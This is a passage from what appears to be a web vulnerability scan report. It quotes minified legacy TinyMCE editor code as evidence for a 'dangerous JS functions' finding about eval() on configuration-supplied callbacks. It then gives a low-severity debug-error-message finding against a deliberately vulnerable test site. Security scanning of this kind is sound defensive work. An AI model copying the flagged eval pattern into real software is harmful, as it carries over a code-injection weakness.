contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| Instances | 1 |
| Solution |
See the references for security advice on the use of these functions.
|
| Reference | https://angular.io/guide/security |
| Tags |
WSTG-v42-CLNT-02
OWASP_2021_A04 |
| CWE Id | 749 |
| WASC Id | |
| Plugin Id | 10110 |
|
Low |
Information Disclosure - Debug Error Messages |
|---|---|
| Description |
The response appeared to contain common error messages returned by platforms such as ASP.NET, and Web-servers such as IIS and Apache. You can configure the list of common debug messages.
|
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Internal server error |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
